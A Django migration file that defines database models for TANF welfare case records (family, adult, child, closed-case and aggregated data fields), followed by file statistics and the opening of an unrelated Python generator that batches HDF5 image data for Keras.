('imported_at', models.DateTimeField(verbose_name='time record was imported (metadata)')),
('imported_by', models.CharField(max_length=64, verbose_name='who record was imported by (metadata)')),
('valid', models.BooleanField(default=True, verbose_name='has record passed validation checks')),
('invalidreason', models.CharField(default='', max_length=1024, verbose_name='Reason(s) why record did not pass validation. (metadata)')),
('calendar_quarter', models.IntegerField(verbose_name='calendar quarter (header)')),
('state_code', models.CharField(max_length=3, verbose_name='state fips code (header)')),
('tribe_code', models.CharField(max_length=3, verbose_name='tribe code (header)')),
('recordtype', models.CharField(max_length=2, verbose_name='record type (T2)')),
('reportingmonth', models.CharField(max_length=6, verbose_name='reporting month (item 4)')),
('casenumber', models.CharField(max_length=11, verbose_name='case number (item 6)')),
('familyafilliation', models.IntegerField(verbose_name='family affiliation (item 30)')),
('noncustodialparent', models.IntegerField(verbose_name='noncustodial parent (item 31)')),
('dateofbirth', models.DateField(verbose_name='date of birth (item 32)')),
('socialsecuritynumber', models.CharField(max_length=9, verbose_name='social security number (item 33)')),
('racehispanic', models.CharField(max_length=1, verbose_name='race/ethnicity: hispanic or latino (item 34a)')),
('racenativeamerican', models.CharField(max_length=1, verbose_name='race/ethnicity: american indian or alaska native (item 34b)')),
('raceasian', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: asian (item 34c)')),
('raceblack', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: black or african american (item 34d)')),
('raceislander', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: islander (item 34e)')),
('racewhite', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: white (item 34f)')),
('gender', models.IntegerField(default=0, verbose_name='gender (item 35)')),
('oasdibenefits', models.CharField(default='', max_length=1, verbose_name='receives disability benefits: received federal disability insurance benefits under the oasdi program (item 36a)')),
('nonssabenefits', models.CharField(default='', max_length=1, verbose_name='receives disability benefits: receives benefits based on federal disability status under non-ssa programs (item 36b)')),
('titlexivapdtbenefits', models.CharField(default='', max_length=1, verbose_name='receives disability benefits: received aid to the permanently and totally disabled under title xiv-apdt (item 36c)')),
('titlexviaabdbenefits', models.CharField(default='', max_length=1, verbose_name='receives disability benefits: received aid to the aged, blind, and disabled under title xvi-aabd (item 36d)')),
('titlexvissibenefits', models.CharField(default='', max_length=1, verbose_name='receives disability benefits: received ssi under title xvi-ssi (item 36e)')),
('maritalstatus', models.CharField(default='', max_length=1, verbose_name='marital status (item 37)')),
('relationshiptohh', models.IntegerField(default=0, verbose_name='relationship to head of household (item 38)')),
('parentminorchild', models.CharField(default='', max_length=1, verbose_name='parent with minor child in the family (item 39)')),
('pregnantneeds', models.CharField(default='', max_length=1, verbose_name='needs of a pregnant woman (item 40)')),
('educationlevel', models.CharField(default='', max_length=2, verbose_name='education level (item 41)')),
('citizenship', models.CharField(default='', max_length=1, verbose_name='citizenship/alienage (item 42)')),
('coopwithchildsupport', models.CharField(default='', max_length=1, verbose_name='cooperation with child support (item 43)')),
('countablemonths', models.CharField(default='', max_length=3, verbose_name='number of countable months toward federal time limit (item 44)')),
('countablemonthsremaining', models.CharField(default='', max_length=2, verbose_name='number of countable months remaining under state/tribe limit (item 45)')),
('currentmonthexempt', models.CharField(default='', max_length=1, verbose_name='current month exempt from state tribe time-limit (item 46)')),
('employmentstatus', models.CharField(default='', max_length=1, verbose_name='employment status (item 47)')),
('workeligibleindicator', models.CharField(default='', max_length=2, verbose_name='work eligible individual indicator (item 48)')),
('workparticipationstatus', models.CharField(default='', max_length=2, verbose_name='work participation status (item 49)')),
('unsubsidizedemployment', models.CharField(default='', max_length=2, verbose_name='unsubsidized employment (item 50)')),
('subsidizedprivateemployment', models.CharField(default='', max_length=2, verbose_name='subsidized private employment (item 51)')),
('subsidizedpublicemployment', models.CharField(default='', max_length=2, verbose_name='subsidized public employment (item 52)')),
('workexperiencehours', models.CharField(default='', max_length=2, verbose_name='work experience: hours of participation (item 53a)')),
('workexperienceexcusedabsences', models.CharField(default='', max_length=2, verbose_name='work experience: excused absences (item 53b)')),
('workexperienceholidays', models.CharField(default='', max_length=2, verbose_name='work experience: holidays (item 53c)')),
('onthejobtraining', models.CharField(default='', max_length=2, verbose_name='on the job training (item 54)')),
('jobsearchhours', models.CharField(default='', max_length=2, verbose_name='job search & job readiness: hours of participation (item 55a)')),
('jobsearchexcusedabsences', models.CharField(default='', max_length=2, verbose_name='job search & job readiness: excused absences (item 55b)')),
('jobsearchholidays', models.CharField(default='', max_length=2, verbose_name='job search & job readiness: holidays (item 55c)')),
('communitysvchours', models.CharField(default='', max_length=2, verbose_name='community svs prog: hours of participation (item 56a)')),
('communitysvcexcusedabsences', models.CharField(default='', max_length=2, verbose_name='community svs prog: excused absences (item 56b)')),
('communitysvcholidays', models.CharField(default='', max_length=2, verbose_name='community svs prog: holidays (item 56c)')),
('vocationaltraininghours', models.CharField(default='', max_length=2, verbose_name='vocational education training: hours of participation (item 57a)')),
('vocationaltrainingexcusedabsences', models.CharField(default='', max_length=2, verbose_name='vocational education training: excused absences (item 57b)')),
('vocationaltrainingholidays', models.CharField(default='', max_length=2, verbose_name='vocational education training: holidays (item 57c)')),
('jobskillshours', models.CharField(default='', max_length=2, verbose_name='job skills training employment related: hours of participation (item 58a)')),
('jobskillsexcusedabsences', models.CharField(default='', max_length=2, verbose_name='job skills training employment related: excused absences (item 58b)')),
('jobskillsholidays', models.CharField(default='', max_length=2, verbose_name='job skills training employment related: holidays (item 58c)')),
('eduwithnodiplomahours', models.CharField(default='', max_length=2, verbose_name='education related to employment with no high school diploma: hours of participation (item 59a)')),
('eduwithnodiplomaexcusedabsences', models.CharField(default='', max_length=2, verbose_name='education related to employment with no high school diploma: excused absences (item 59b)')),
('eduwithnodiplomaholidays', models.CharField(default='', max_length=2, verbose_name='education related to employment with no high school diploma: holidays (item 59c)')),
('satisfactoryschoolhours', models.CharField(default='', max_length=2, verbose_name='satisfactory school attendance: hours of participation (item 60a)')),
('satisfactoryschoolexcusedabsences', models.CharField(default='', max_length=2, verbose_name='satisfactory school attendance: excused absences (item 60b)')),
('satisfactoryschoolholidays', models.CharField(default='', max_length=2, verbose_name='satisfactory school attendance: holidays (item 60c)')),
('providingchildcarehours', models.CharField(default='', max_length=2, verbose_name='providing child care: hours of participation (item 61a)')),
('providingchildcareexcusedabsences', models.CharField(default='', max_length=2, verbose_name='providing child care: excused absences (item 61b)')),
('providingchildcareholidays', models.CharField(default='', max_length=2, verbose_name='providing child care: holidays (item 61c)')),
('otherwork', models.CharField(default='', max_length=2, verbose_name='other work activities (item 62)')),
('corehoursforoverallrate', models.CharField(default='', max_length=2, verbose_name='number of deemed core hours for overall rate (item 63)')),
('corehoursfortwoparentrate', models.CharField(default='', max_length=2, verbose_name='number of deemed core hours for the two-parent rate (item 64)')),
('earnedincome', models.CharField(default='', max_length=4, verbose_name='amount of earned income (item 65)')),
('unearnedincomeincometaxcredit', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: earned income tax credit (item 66a)')),
('unearnedincomesocialsecurity', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: social security (item 66b)')),
('unearnedincomessi', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: SSI (item 66c)')),
('unearnedincomeworkerscomp', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: workers compensation (item 66d)')),
('unearnedincomeother', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: other unearned income (item 66e)')),
],
),
migrations.CreateModel(
name='AggregatedData',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('imported_at', models.DateTimeField(verbose_name='time record was imported (metadata)')),
('imported_by', models.CharField(max_length=64, verbose_name='who record was imported by (metadata)')),
('valid', models.BooleanField(default=True, verbose_name='has record passed validation checks')),
('invalidreason', models.CharField(default='', max_length=1024, verbose_name='Reason(s) why record did not pass validation. (metadata)')),
('calendar_quarter', models.IntegerField(verbose_name='calendar quarter (header)')),
('state_code', models.CharField(max_length=3, verbose_name='state fips code (header)')),
('tribe_code', models.CharField(max_length=3, verbose_name='tribe code (header)')),
('recordtype', models.CharField(max_length=2, verbose_name='record type (T6)')),
('calendaryear', models.IntegerField(verbose_name='calendar year (item 3)')),
('calendarquarter', models.IntegerField(verbose_name='calendar quarter (item 3)')),
('firstmonthapps', models.IntegerField(verbose_name='total number of applicants: first month (item 4)')),
('secondmonthapps', models.IntegerField(verbose_name='total number of applicants: second month (item 4)')),
('thirdmonthapps', models.IntegerField(verbose_name='total number of applicants: third month (item 4)')),
('firstmonthapprovals', models.IntegerField(verbose_name='total number of approved applications: first month (item 5)')),
('secondmonthapprovals', models.IntegerField(verbose_name='total number of approved applications: second month (item 5)')),
('thirdmonthapprovals', models.IntegerField(verbose_name='total number of approved applications: third month (item 5)')),
('firstmonthdenied', models.IntegerField(verbose_name='total number of denied applications: first month (item 6)')),
('secondmonthdenied', models.IntegerField(verbose_name='total number of denied applications: second month (item 6)')),
('thirdmonthdenied', models.IntegerField(verbose_name='total number of denied applications: third month (item 6)')),
('firstmonthassist', models.IntegerField(default=0, verbose_name='total amount of assistance: first month (item 7)')),
('secondmonthassist', models.IntegerField(default=0, verbose_name='total amount of assistance: second month (item 7)')),
('thirdmonthassist', models.IntegerField(default=0, verbose_name='total amount of assistance: third month (item 7)')),
],
),
migrations.CreateModel(
name='Child',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('imported_at', models.DateTimeField(verbose_name='time record was imported (metadata)')),
('imported_by', models.CharField(max_length=64, verbose_name='who record was imported by (metadata)')),
('valid', models.BooleanField(default=True, verbose_name='has record passed validation checks')),
('invalidreason', models.CharField(default='', max_length=1024, verbose_name='Reason(s) why record did not pass validation. (metadata)')),
('calendar_quarter', models.IntegerField(verbose_name='calendar quarter (header)')),
('state_code', models.CharField(max_length=3, verbose_name='state fips code (header)')),
('tribe_code', models.CharField(max_length=3, verbose_name='tribe code (header)')),
('recordtype', models.CharField(max_length=2, verbose_name='record type (T3)')),
('reportingmonth', models.CharField(max_length=6, verbose_name='reporting month (item 4)')),
('casenumber', models.CharField(max_length=11, verbose_name='case number (item 6)')),
('familyafilliation_1', models.IntegerField(default=0, verbose_name='family affiliation1: Child 1,3,5,7,9 (item 67)')),
('dateofbirth_1', models.DateField(verbose_name='date of birth (item 68)')),
('socialsecuritynumber_1', models.CharField(default='', max_length=9, verbose_name='social security number (item 69)')),
('racehispanic_1', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: hispanic or latino (item 70a)')),
('racenativeamerican_1', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: american indian or alaska native (item 70b)')),
('raceasian_1', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: asian (item 70c)')),
('raceblack_1', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: black or african american islander (item 70d)')),
('racepacific_1', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: native hawaiian or other pacific islander (item 70e)')),
('racewhite_1', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: white (item 70f)')),
('gender_1', models.IntegerField(default=0, verbose_name='gender (item 71)')),
('nonssabenefits_1', models.CharField(default='', max_length=1, verbose_name='receives disability benefits: receives benefits based on federal disability status under non-ssa programs (item 72a)')),
('titlexvissibenefits_1', models.CharField(default='', max_length=1, verbose_name='receives disability benefits: received ssi under title xvi-ssi (item 72b)')),
('relationshiptohh_1', models.IntegerField(default=0, verbose_name='relationship to head of household (item 73)')),
('parentminorchild_1', models.CharField(default='', max_length=1, verbose_name='parent with minor child in the family (item 74)')),
('educationlevel_1', models.CharField(default='', max_length=12, verbose_name='education level (item 75)')),
('citizenship_1', models.CharField(default='', max_length=1, verbose_name='citizenship/alienage (item 76)')),
('unearnedincomessi_1', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: SSI (item 77a)')),
('unearnedincomeother_1', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: other unearned income (item 77b)')),
('familyafilliation_2', models.IntegerField(default=0, verbose_name='family affiliation 2: Child 2,4,6,8,10 (item 67)')),
('dateofbirth_2', models.DateField(default=datetime.date.today, verbose_name='date of birth (item 68)')),
('socialsecuritynumber_2', models.CharField(default='', max_length=9, verbose_name='social security number (item 69)')),
('racehispanic_2', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: hispanic or latino (item 70a)')),
('racenativeamerican_2', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: american indian or alaska native (item 70b)')),
('raceasian_2', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: asian (item 70c)')),
('raceblack_2', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: black or african american islander (item 70d)')),
('racepacific_2', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: native hawaiian or other pacific islander (item 70e)')),
('racewhite_2', models.CharField(default='', max_length=1, verbose_name='race/ethnicity: white (item 70f)')),
('gender_2', models.IntegerField(default=0, verbose_name='gender (item 71)')),
('nonssabenefits_2', models.CharField(default='', max_length=1, verbose_name='receives disability benefits: receives benefits based on federal disability status under non-ssa programs (item 72a)')),
('titlexvissibenefits_2', models.CharField(default='', max_length=1, verbose_name='receives disability benefits: received ssi under title xvi-ssi (item 72b)')),
('relationshiptohh_2', models.IntegerField(default=0, verbose_name='relationship to head of household (item 73)')),
('parentminorchild_2', models.CharField(default='', max_length=1, verbose_name='parent with minor child in the family (item 74)')),
('educationlevel_2', models.CharField(default='', max_length=12, verbose_name='education level (item 75)')),
('citizenship_2', models.CharField(default='', max_length=1, verbose_name='citizenship/alienage (item 76)')),
('unearnedincomessi_2', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: SSI (item 77a)')),
('unearnedincomeother_2', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: other unearned income (item 77b)')),
('jobsearchhours', models.CharField(default='', max_length=2, verbose_name='job search & job readiness: hours of participation (item 55a)')),
('jobsearchexcusedabsences', models.CharField(default='', max_length=2, verbose_name='job search & job readiness: excused absences (item 55b)')),
('jobsearchholidays', models.CharField(default='', max_length=2, verbose_name='job search & job readiness: holidays (item 55c)')),
('communitysvchours', models.CharField(default='', max_length=2, verbose_name='community svs prog: hours of participation (item 56a)')),
('communitysvcexcusedabsences', models.CharField(default='', max_length=2, verbose_name='community svs prog: excused absences (item 56b)')),
('communitysvcholidays', models.CharField(default='', max_length=2, verbose_name='community svs prog: holidays (item 56c)')),
('vocationaltraininghours', models.CharField(default='', max_length=2, verbose_name='vocational education training: hours of participation (item 57a)')),
('vocationaltrainingexcusedabsences', models.CharField(default='', max_length=2, verbose_name='vocational education training: excused absences (item 57b)')),
('vocationaltrainingholidays', models.CharField(default='', max_length=2, verbose_name='vocational education training: holidays (item 57c)')),
('jobskillshours', models.CharField(default='', max_length=2, verbose_name='job skills training employment related: hours of participation (item 58a)')),
('jobskillsexcusedabsences', models.CharField(default='', max_length=2, verbose_name='job skills training employment related: excused absences (item 58b)')),
('jobskillsholidays', models.CharField(default='', max_length=2, verbose_name='job skills training employment related: holidays (item 58c)')),
('eduwithnodiplomahours', models.CharField(default='', max_length=2, verbose_name='education related to employment with no high school diploma: hours of participation (item 59a)')),
('eduwithnodiplomaexcusedabsences', models.CharField(default='', max_length=2, verbose_name='education related to employment with no high school diploma: excused absences (item 59b)')),
('eduwithnodiplomaholidays', models.CharField(default='', max_length=2, verbose_name='education related to employment with no high school diploma: holidays (item 59c)')),
('satisfactoryschoolhours', models.CharField(default='', max_length=2, verbose_name='satisfactory school attendance: hours of participation (item 60a)')),
('satisfactoryschoolexcusedabsences', models.CharField(default='', max_length=2, verbose_name='satisfactory school attendance: excused absences (item 60b)')),
('satisfactoryschoolholidays', models.CharField(default='', max_length=2, verbose_name='satisfactory school attendance: holidays (item 60c)')),
('providingchildcarehours', models.CharField(default='', max_length=2, verbose_name='providing child care: hours of participation (item 61a)')),
('providingchildcareexcusedabsences', models.CharField(default='', max_length=2, verbose_name='providing child care: excused absences (item 61b)')),
('providingchildcareholidays', models.CharField(default='', max_length=2, verbose_name='providing child care: holidays (item 61c)')),
('otherwork', models.CharField(default='', max_length=2, verbose_name='other work activities (item 62)')),
('corehoursforoverallrate', models.CharField(default='', max_length=2, verbose_name='number of deemed core hours for overall rate (item 63)')),
('corehoursfortwoparentrate', models.CharField(default='', max_length=2, verbose_name='number of deemed core hours for the two-parent rate (item 64)')),
('earnedincome', models.CharField(default='', max_length=4, verbose_name='amount of earned income (item 65)')),
('unearnedincomeincometaxcredit', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: earned income tax credit (item 66a)')),
('unearnedincomesocialsecurity', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: social security (item 66b)')),
('unearnedincomessi', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: SSI (item 66c)')),
('unearnedincomeworkerscomp', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: workers compensation (item 66d)')),
('unearnedincomeother', models.CharField(default='', max_length=4, verbose_name='amount of unearned income: other unearned income (item 66e)')),
],
),
migrations.CreateModel(
name='ClosedCase',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('imported_at', models.DateTimeField(verbose_name='time record was imported (metadata)')),
('imported_by', models.CharField(max_length=64, verbose_name='who record was imported by (metadata)')),
('calendar_quarter', models.IntegerField(verbose_name='calendar quarter (header)')),
('state_code', models.CharField(max_length=3, verbose_name='state fips code (header)')),
('tribe_code', models.CharField(max_length=3, verbose_name='tribe code (header)')),
('recordtype', models.CharField(max_length=2, verbose_name='record type (T4)')),
('reportingmonth', models.CharField(max_length=6, verbose_name='reporting month (item 4)')),
('casenumber', models.CharField(max_length=11, verbose_name='case number (item 6)')),
('countyfipscode', models.IntegerField(verbose_name='county fips code (item 2)')),
('stratum', models.IntegerField(verbose_name='stratum (item 5)')),
('zipcode', models.CharField(max_length=5, verbose_name='zipcode (item 7)')),
('disposition', models.IntegerField(verbose_name='disposition (item 8)')),
('closurereason', models.IntegerField(verbose_name='reason for closure (item 9)')),
('receivessubsidizedhousing', models.CharField(max_length=1, verbose_name='receives subsidized housing (item 10)')),
('receivesmedicalassistance', models.CharField(max_length=1, verbose_name='receives medical assistance (item 11)')),
('receivesfoodstamps', models.CharField(max_length=1, verbose_name='receives food stamps (item 12)')),
('receivessubsidizedchildcare', models.CharField(max_length=1, verbose_name='receives subsidized child care (item 13)')),
],
),
migrations.CreateModel(
name='ClosedPerson',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('imported_at', models.DateTimeField(verbose_name='time record was imported (metadata)')),
('imported_by', models.CharField(max_length=64, verbose_name='who record was imported by (metadata)')),
('valid', models.BooleanField(default=True, verbose_name='has record passed validation checks')),
('invalidreason', models.CharField(default='', max_length=1024, verbose_name='Reason(s) why record did not pass validation. (metadata)')),
('calendar_quarter', models.IntegerField(verbose_name='calendar quarter (header)')),
('state_code', models.CharField(max_length=3, verbose_name='state fips code (header)')),
('tribe_code', models.CharField(max_length=3, verbose_name='tribe code (header)')),
('recordtype', models.CharField(max_length=2, verbose_name='record type (T5)')),
('reportingmonth', models.CharField(max_length=6, verbose_name='reporting month (item 4)')),
('casenumber', models.CharField(max_length=11, verbose_name='case number (item 6)')),
('familyafilliation', models.IntegerField(verbose_name='family affiliation (item 14)')),
('dateofbirth', models.DateField(verbose_name='date of birth (item 15)')),
('socialsecuritynumber', models.CharField(max_length=9, verbose_name='social security number (item 16)')),
('racehispanic', models.CharField(max_length=1, verbose_name='race/ethnicity: hispanic or latino (item 17a)')),
('racenativeamerican', models.CharField(max_length=1, verbose_name='race/ethnicity: american indian or alaska native (item 17b)')),
('raceasian', models.CharField(max_length=1, verbose_name='race/ethnicity: asian (item 17c)')),
('raceblack', models.CharField(max_length=1, verbose_name='race/ethnicity: black or african american (item 17d)')),
('racepacific', models.CharField(max_length=1, verbose_name='race/ethnicity: native hawaiian or other pacific islander (item 17e)')),
('racewhite', models.CharField(max_length=1, verbose_name='race/ethnicity: white (item 17f)')),
('gender', models.IntegerField(verbose_name='gender (item 18)')),
('oasdibenefits', models.CharField(max_length=1, verbose_name='receives disability benefits: received federal disability insurance benefits under the oasdi program (item 19a)')),
('nonssabenefits', models.CharField(max_length=1, verbose_name='receives disability benefits: receives benefits based on federal disability status under non-ssa programs (item 19b)')),
('titlexivapdtbenefits', models.CharField(max_length=1, verbose_name='receives disability benefits: received aid to the permanently and totally disabled under title xiv-apdt (item 19c)')),
('titlexviaabdbenefits', models.CharField(max_length=1, verbose_name='receives disability benefits: received aid to the aged, blind, and disabled under title xvi-aabd (item 19d)')),
('titlexvissibenefits', models.CharField(max_length=1, verbose_name='receives disability benefits: received ssi under title xvi-ssi (item 19e)')),
('maritalstatus', models.CharField(max_length=1, verbose_name='marital status (item 20)')),
('relationshiptohh', models.IntegerField(verbose_name='relationship to head of household (item 21)')),
('parentminorchild', models.CharField(max_length=1, verbose_name='parent with minor child in the family (item 22)')),
('pregnantneeds', models.CharField(max_length=11, verbose_name='needs of a pregnant woman (item 23)')),
('educationlevel', models.CharField(max_length=12, verbose_name='education level (item 24)')),
('citizenship', models.CharField(max_length=1, verbose_name='citizenship/alienage (item 25)')),
('countablemonths', models.IntegerField(verbose_name='number of countable months toward federal time limit (item 26)')),
('countablemonthsremaining', models.IntegerField(verbose_name='number of countable months remaining under state/tribe limit (item 27)')),
('employmentstatus', models.CharField(max_length=1, verbose_name='employment status (item 28)')),
('earnedincome', models.IntegerField(verbose_name='amount of earned income (item 29)')),
('unearnedincome', models.IntegerField(verbose_name='amount of unearned income (item 30)')),
],
),
migrations.CreateModel(
name='FamiliesByStratumData',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('imported_at', models.DateTimeField(verbose_name='time record was imported (metadata)')),
('imported_by', models.CharField(max_length=64, verbose_name='who record was imported by (metadata)')),
('valid', models.BooleanField(default=True, verbose_name='has record passed validation checks')),
('invalidreason', models.CharField(default='', max_length=1024, verbose_name='Reason(s) why record did not pass validation. (metadata)')),
('calendar_quarter', models.IntegerField(verbose_name='calendar quarter (header)')),
('state_code', models.CharField(max_length=3, verbose_name='state fips code (header)')),
('tribe_code', models.CharField(max_length=3, verbose_name='tribe code (header)')),
('recordtype', models.CharField(max_length=2, verbose_name='record type (T7)')),
('calendaryear', models.IntegerField(verbose_name='calendar year (item 3)')),
('calendarquarter', models.IntegerField(verbose_name='calendar quarter (item 3)')),
],
),
migrations.CreateModel(
name='Family',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('imported_at', models.DateTimeField(verbose_name='time record was imported (metadata)')),
('imported_by', models.CharField(max_length=64, verbose_name='who record was imported by (metadata)')),
('valid', models.BooleanField(default=True, verbose_name='has record passed validation checks')),
('invalidreason', models.CharField(default='', max_length=1024, verbose_name='Reason(s) why record did not pass validation. (metadata)')),
('calendar_quarter', models.IntegerField(verbose_name='calendar quarter (header)')),
('state_code', models.CharField(max_length=3, verbose_name='state fips code (header)')),
('tribe_code', models.CharField(max_length=3, verbose_name='tribe code (header)')),
('recordtype', models.CharField(max_length=2, verbose_name='record type (T1)')),
('reportingmonth', models.CharField(max_length=6, verbose_name='reporting month (item 4)')),
('casenumber', models.CharField(max_length=11, verbose_name='case number (item 6)')),
('countyfipscode', models.IntegerField(verbose_name='county fips code (item 2)')),
('stratum', models.IntegerField(verbose_name='stratum (item 5)')),
('zipcode', models.CharField(max_length=5, verbose_name='zipcode (item 7)')),
('fundingstream', models.IntegerField(verbose_name='funding stream (item 8)')),
('disposition', models.IntegerField(verbose_name='disposition (item 9)')),
('newapplicant', models.IntegerField(verbose_name='new applicant (item 10)')),
('numfamilymembers', models.IntegerField(verbose_name='number family members (item 11)')),
('typeoffamilyforworkparticipation', models.IntegerField(verbose_name='type of family for work participation (item 12)')),
('receivessubsidizedhousing', models.CharField(max_length=1, verbose_name='receives subsidized housing (item 13)')),
('receivesmedicalassistance', models.CharField(max_length=1, verbose_name='receives medical assistance (item 14)')),
('receivesfoodstamps', models.CharField(max_length=1, verbose_name='receives food stamps (item 15)')),
('amtoffoodstampassistance', models.IntegerField(verbose_name='amount of food stamp assistance (item 16)')),
('receivessubsidizedchildcare', models.CharField(max_length=1, verbose_name='receives food stamps (item 17)')),
('amtofsubsidizedchildcare', models.IntegerField(verbose_name='amount of subsidized child care (item 18)')),
('amtofchildsupport', models.IntegerField(verbose_name='amount of child support (item 19)')),
('amtoffamilycashresources', models.IntegerField(verbose_name='amount of familys cash resources (item 20)')),
('cash_amount', models.IntegerField(verbose_name='cash and cash equivalents amount (item 21a)')),
('cash_nbr_month', models.IntegerField(verbose_name='cash and cash equivalents number of months (item 21b)')),
('tanfchildcare_amount', models.IntegerField(verbose_name='TANF child care amount (item 22a)')),
('tanfchildcare_children_covered', models.IntegerField(verbose_name='TANF child care children covered (item 22b)')),
('tanfchildcare_nbr_months', models.IntegerField(verbose_name='TANF child care number of months (item 22c)')),
('transportation_amount', models.IntegerField(verbose_name='transportation amount (item 23a)')),
('transportation_nbr_months', models.IntegerField(verbose_name='transportation number of months (item 23b)')),
('transitionalservices_amount', models.IntegerField(verbose_name='transitional services amount (item 24a')),
('transitionalservices_nbr_months', models.IntegerField(verbose_name='transitional services number of months (item 24b)')),
('other_amount', models.IntegerField(verbose_name='other amount (item 25a')),
('other_nbr_months', models.IntegerField(verbose_name='other number of months (item 25b)')),
('sanctionsreduction_amt', models.IntegerField(verbose_name='reason for and amount of assistance reduction: sanctions reduction_amount (item 26a)')),
('workrequirementssanction', models.CharField(max_length=4, verbose_name='reason for and amount of assistance reduction: work requirements sanction (item 26a)')),
('familysanctionforadultnohsdiploma', models.CharField(max_length=1, verbose_name='reason for and amount of assistance reduction: family sanction for adult, no high school diploma (item 26a)')),
('sanctionforteenparentnotattendingschool', models.CharField(max_length=1, verbose_name='reason for and amount of assistance reduction: sanction for teen parent not attending school (item 26a)')),
('noncooperatewithchildsupport', models.CharField(max_length=1, verbose_name='reason for and amount of assistance reduction: non-cooperation with child support (item 26a)')),
('failuretocomploywithirp', models.CharField(max_length=1, verbose_name='reason for and amount of assistance reduction: failure to comply with individual responsibility plan (item 26a)')),
('othersanction', models.CharField(max_length=1, verbose_name='reason for and amount of assistance reduction: other sanction (item 26a)')),
('recoupmentofprioroverpayment', models.CharField(max_length=4, verbose_name='reason for and amount of assistance reduction: recourpment of prior overpayment (item 26b)')),
('othertotalreductionamt', models.CharField(max_length=4, verbose_name='reason for and amount of assistance reduction: other total reduction amount (item 26c)')),
('familycap', models.CharField(max_length=1, verbose_name='reason for and amount of assistance reduction: family cap (item 26c)')),
('reductionbasedonlengthofreceiptofassistance', models.CharField(max_length=1, verbose_name='reason for and amount of assistance reduction: reduction based on length of receipt of assistance (item 26c)')),
('othernonsanction', models.CharField(max_length=1, verbose_name='reason for and amount of assistance reduction: other, non-sanction (item 26c)')),
('waiver_evaluation_control_gprs', models.CharField(max_length=1, verbose_name='waiver_evaluation_control_gprs (item 27)')),
('tanffamilyexemptfromtimelimits', models.IntegerField(verbose_name='TANF family exempt from time_limits (item 28)')),
('tanffamilynewchildonlyfamily', models.IntegerField(verbose_name='TANF family new child only family (item 29)')),
],
),
]
| 118.642651
| 221
| 0.67886
| 4,491
| 41,169
| 6.087286
| 0.116455
| 0.119102
| 0.098178
| 0.111566
| 0.857415
| 0.847758
| 0.827749
| 0.810008
| 0.771307
| 0.733631
| 0
| 0.022579
| 0.189949
| 41,169
| 346
| 222
| 118.985549
| 0.797175
| 0.001093
| 0
| 0.477876
| 1
| 0.014749
| 0.44188
| 0.053913
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.038348
| 0.047198
| 0
| 0.058997
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b3f03c40283ac5ffb770e2682317f3ec38057be5
| 5,064
|
py
|
Python
|
preprocessing/emotic/custom_generator.py
|
GKalliatakis/DisplaceNet
|
439bcd5ed4133b040baa107c215170eb963aa343
|
[
"MIT"
] | 7
|
2019-05-13T01:49:43.000Z
|
2020-02-19T04:16:35.000Z
|
preprocessing/emotic/custom_generator.py
|
GKalliatakis/DisplaceNet
|
439bcd5ed4133b040baa107c215170eb963aa343
|
[
"MIT"
] | null | null | null |
preprocessing/emotic/custom_generator.py
|
GKalliatakis/DisplaceNet
|
439bcd5ed4133b040baa107c215170eb963aa343
|
[
"MIT"
] | 4
|
2019-05-28T16:06:31.000Z
|
2020-02-27T09:29:16.000Z
|
"""Custom generator for pentuple-output Keras models.
"""
from math import ceil
def custom_generator(hdf5_file, nb_data, batch_size, mode):
""" Generates batches of tensor image data in form of ==> (x1, y1) ,(x2, y2).
# Reference
- https://stackoverflow.com/questions/50333532/load-images-and-annotations-from-csv-and-use-fit-generator-with-multi-output-mod
- http://machinelearninguru.com/deep_learning/data_preparation/hdf5/hdf5.html
# Arguments
hdf5_file: path or hdf5 object which contains the images and the annotations.
nb_data: total number of samples saved in the array.
batch_size: size of the batch to generate tensor image data for.
module: one of `body` or `image`.
# Returns
A generator object.
"""
batches_list = list(range(int(ceil(float(nb_data) / batch_size))))
while True:
# loop over batches
for n, i in enumerate(batches_list):
i_s = i * batch_size # index of the first image in this batch
i_e = min([(i + 1) * batch_size, nb_data]) # index of the last image in this batch
if mode == 'train':
body_x = hdf5_file["x_cropped_train"][i_s:i_e, ...]
image_x = hdf5_file["x_entire_train"][i_s:i_e, ...]
# valence_body_y = hdf5_file["valence_cropped_train"][i_s:i_e]
